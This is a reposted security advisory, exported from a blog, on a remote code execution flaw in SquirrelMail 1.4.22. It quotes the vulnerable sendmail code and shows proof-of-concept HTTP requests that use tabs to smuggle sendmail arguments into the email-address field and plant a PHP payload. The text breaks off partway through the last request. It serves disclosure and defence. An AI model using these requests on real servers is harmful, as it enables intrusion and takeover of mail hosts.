{"id":7446,"date":"2017-04-25T14:20:24","date_gmt":"2017-04-25T22:20:24","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/25\/news-1237\/"},"modified":"2017-04-25T14:20:24","modified_gmt":"2017-04-25T22:20:24","slug":"news-1237","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/04\/25\/news-1237\/","title":{"rendered":"SSD Advisory \u2013 SquirrelMail Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 25 Apr 2017 05:24:06 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes Remote Code Execution found in SquirrelMail version 1.4.22.<\/p>\n<p>SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. 
SquirrelMail has all the functionality you would  want from an email client, including strong MIME support, address books, and folder manipulation.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Dawid Golunski (https:\/\/legalhackers.com\/), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> SquirrelMail has released patches to address this vulnerability, for more details see: <a href=\"https:\/\/squirrelmail.org\/security\/issue\/2017-04-24\" target=\"_blank\">https:\/\/squirrelmail.org\/security\/issue\/2017-04-24<\/a><\/p>\n<p><span id=\"more-3178\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> SquirrelMail is affected by a Remote Code Execution vulnerability which stems from insufficient escaping of user-supplied data when SquirrelMail has been configured with Sendmail as the main transport. An authenticated attacker may be able to exploit the vulnerability to execute arbitrary commands on the target and compromise the remote system.<\/p>\n<p>When SquirrelMail has been configured with Sendmail as delivery transport,<\/p>\n<p>SquirrelMail uses the following function to send out user emails:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bdf730323661\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div 
class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> -----[ .\/class\/deliver\/Deliver_SendMail.class.php ]-----\n\n    function initStream($message, $sendmail_path, $ignore=0, $ignore='', $ignore='', $ignore='', $ignore='', $ignore=false, $ignore='') {\n        $rfc822_header = $message-&gt;rfc822_header;\n        $from = $rfc822_header-&gt;from[0];\n        $envelopefrom = trim($from-&gt;mailbox.'@'.$from-&gt;host);\n        $envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom);\n        \/\/ save executed command for future reference\n        $this-&gt;sendmail_command = \"$sendmail_path $this-&gt;sendmail_args -f$envelopefrom\";\n        \/\/ open process handle for writing\n        $stream = popen(escapeshellcmd($this-&gt;sendmail_command), \"w\");
        return $stream;\n    }\n\n---------------------------------------------------------<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0072 seconds] -->  <\/p>\n<p>The function passes the sender&#8217;s email address to the <em>sendmail<\/em> command line in the <em>$envelopefrom<\/em> variable.<\/p>\n<p>SquirrelMail allows logged-in users to change the envelope-from email address by going to:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bef526549895\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Options-&gt; Personal Information-&gt; E-mail Address<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bef526549895-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bef526549895-1\"><span class=\"crayon-v\">Options<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Personal <\/span><span class=\"crayon-v\">Information<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">E<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">mail <\/span><span class=\"crayon-v\">Address<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>The option however filters out spaces to prevent injection of additional parameters to the <em>sendmail<\/em> program.<\/p>\n<p>It is possible to bypass this filter by using TABS instead of SPACES as shown in this request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bf6190049430\" 
class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/squirrelmail\/src\/options.php HTTP\/1.1  Host: trusty  Cookie: squirrelmail_language=deleted; SQMSESSID=udp0a3dbm2oba2710a6amh0kg0; key=aT2bDg%3D%3D; mailviewsplitterv=226; prefviewsplitter=266; folderviewsplitter=266; 
identviewsplitter=266; language=en; composesplitterv=248; addressviewsplitterd=226; addressviewsplitter=286; roundcube_sessid=151ubr2mfl36odovf7vkk66v60; minimalmode=0  Content-Length: 310    smtoken=qseiZ0jvPW8f&amp;optpage=personal&amp;optmode=submit&amp;new_full_name=Squirrel+PoC&amp;new_email_address=root%09-X%2Ftmp%2Fsqhack%09-oQ%2Ftmp%09null&amp;new_reply_to=replymyaddress%40localhost&amp;new_signature=&amp;new_timezone=none&amp;new_reply_citation_style=none&amp;new_reply_citation_start=&amp;new_reply_citation_end=&amp;submit_personal=Submit<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bf6190049430-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740bf6190049430-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bf6190049430-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740bf6190049430-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bf6190049430-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740bf6190049430-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bf6190049430-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">squirrelmail<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740bf6190049430-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trusty<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bf6190049430-3\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">squirrelmail_language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">deleted<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SQMSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">udp0a3dbm2oba2710a6amh0kg0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">aT2bDg<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mailviewsplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prefviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">folderviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">identviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span 
class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">composesplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">248<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitterd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">286<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roundcube_sessid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">151ubr2mfl36odovf7vkk66v60<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">minimalmode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740bf6190049430-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">310<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bf6190049430-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740bf6190049430-6\"><span class=\"crayon-v\">smtoken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">qseiZ0jvPW8f<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">optpage<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">personal<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">optmode<\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-v\">submit<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_full_name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Squirrel<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">PoC<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_email_address<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Ftmp<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Fsqhack<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">oQ<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Ftmp<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">09null<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_reply_to<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">replymyaddress<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">40localhost<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_signature<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">new_timezone<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">none<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_reply_citation_style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">none<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_reply_citation_start<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">new_reply_citation_end<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">submit_personal<\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Submit<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p>As we can see in the <em>new_email_address<\/em> parameter, the spaces have been replaced with <em>%09<\/em>, which is the URL-encoded ASCII tab character.<\/p>\n<p>Such a request will cause SquirrelMail to invoke <em>sendmail<\/em> through <em>popen()<\/em> with the following arguments when a new email is sent out:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bfd238639970\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/usr\/sbin\/sendmail -i -t -froot -X\/tmp\/sqhack -oQ\/tmp null@trusty<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bfd238639970-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bfd238639970-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sbin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sendmail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">froot<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sqhack<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">oQ<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">tmp <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">trusty<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>The -X parameter sets a log file, and -oQ sets a tmp directory.<\/p>\n<p>If the installed <em>MTA<\/em> on the target system is <em>Sendmail<\/em>, and an attacker sends a new email to an arbitrary email address with malicious content containing a PHP script in the body, the log of the email containing the payload will be saved in the location chosen by the attacker. In the example above, the output file would be <em>\/tmp\/sqhack<\/em>.<\/p>\n<p>Example compose message request with a simple PHP payload:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740c03739908820\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/squirrelmail\/src\/compose.php HTTP\/1.1  Host: trusty  Cookie: squirrelmail_language=deleted; SQMSESSID=udp0a3dbm2oba2710a6amh0kg0; key=aT2bDg%3D%3D; mailviewsplitterv=226; prefviewsplitter=266; folderviewsplitter=266; identviewsplitter=266; language=en; composesplitterv=248; addressviewsplitterd=226; addressviewsplitter=286; roundcube_sessid=151ubr2mfl36odovf7vkk66v60; minimalmode=0  Connection: keep-alive  Content-Type: multipart\/form-data; boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;1786870111972091653456139894  Content-Length: 2275    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;smtoken&#8221;    qseiZ0jvPW8f  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;startMessage&#8221;    0  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;session&#8221;    4  
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;passed_id&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send_to&#8221;    victim@localhost  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send_to_cc&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send_to_bcc&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;subject&#8221;    Squirrel PoC  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;mailprio&#8221;    3  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;body&#8221;    Squirrel Hack    &lt;?php phpinfo(); ?&gt;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send&#8221;    Send  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;MAX_FILE_SIZE&#8221;    2097152  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;attachfile&#8221;; filename=&#8221;&#8221;  Content-Type: application\/octet-stream      
